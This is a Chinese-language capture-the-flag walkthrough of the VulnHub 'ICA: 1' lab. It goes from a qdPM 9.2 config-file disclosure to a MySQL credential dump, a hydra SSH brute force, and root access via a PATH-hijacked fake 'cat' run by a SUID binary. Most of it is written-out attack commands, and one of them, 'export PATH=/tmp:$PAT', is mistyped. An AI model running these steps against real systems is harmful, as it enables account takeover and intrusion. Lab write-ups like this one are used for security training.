vulnhun靶场:ica1
靶场地址:ICA: 1 ~ VulnHub
kali:172.88.6.0/24
靶场:172.88.6.74
nmap 172.88.6.0/24
dirb http://172.88.6.74/ 没有发现啥有用的信息
告诉我们使用的是 qdPM 9.2 系统,查看有没有相关漏洞
searchsploit qdPM 9.2
find / -name 50176.txt
cat /usr/share/exploitdb/exploits/php/webapps/50176.txt
wget http://172.88.6.74/core/config/databases.yml
得到用户名和密码:
username: qdpmadmin
password: UcVQCMQk2STVeS6J
mysql -u qdpmadmin -h 172.88.6.74 -p
use qdpm;
show tables;
在qbpm表中没有找到有用信息
use staff;
show tables;
select * from login;
select * from user;
MySQL [staff]> select * from login;
+------+---------+--------------------------+
| id | user_id | password |
+------+---------+--------------------------+
| 1 | 2 | c3VSSkFkR3dMcDhkeTNyRg== |
| 2 | 4 | N1p3VjRxdGc0MmNtVVhHWA== |
| 3 | 1 | WDdNUWtQM1cyOWZld0hkQw== |
| 4 | 3 | REpjZVZ5OThXMjhZN3dMZw== |
| 5 | 5 | Y3FObkJXQ0J5UzJEdUpTeQ== |
+------+---------+--------------------------+
5 rows in set (0.122 sec)
MySQL [staff]> select * from user;
+------+---------------+--------+---------------------------+
| id | department_id | name | role |
+------+---------------+--------+---------------------------+
| 1 | 1 | Smith | Cyber Security Specialist |
| 2 | 2 | Lucas | Computer Engineer |
| 3 | 1 | Travis | Intelligence Specialist |
| 4 | 1 | Dexter | Cyber Security Analyst |
| 5 | 2 | Meyer | Genetic Engineer |
+------+---------------+--------+---------------------------+
将密码解密后是这个样子
suRJAdGwLp8dy3rF
7ZwV4qtg42cmUXGX
X7MQkP3W29fewHdC
DJceVy98W28Y7wLg
cqNnBWCByS2DuJSy
将解密后的密码和用户名放在kali中,以防万一,名字大小写都写一遍放在user中
语法:Hydra 参数 IP 服务
参数:
-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t tasks 同时运行的线程数,默认是16
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码。
hydra -e nsr -L user -P pass 172.88.6.74 ssh -t 4 -o hydra.out
用户名:travis 密码:DJceVy98W28Y7wLg
用户名:dexter 密码:7ZwV4qtg42cmUXGX
ssh dexter@172.88.6.74
ssh travis@172.88.6.74
翻译过来:
在我看来,访问系统时存在弱点。
据我所知,可执行文件的内容是部分可见的。
我需要找出是否存在漏洞。
find / -perm -u=s -type f 2>/dev/null
大概是 -perm -u=s 是查找root权限文件, 2>/dev/null 是把错误信息输入到“黑洞”中
cat /opt/get_access
发现乱码
cd /home/dexter
strings /opt/get_access
看到了setuid还执行了cat命令,猜测是setuid提权,那就伪造个cat来提权
cd /tmp
echo '/bin/bash' >cat
chmod 777 cat
export PATH=/tmp:$PAT
echo $PATH
这个靶场的难度也就在用hydra进行爆破和提权,还有自定义 cat的时候不太明白,看了其他的才稍微懂一点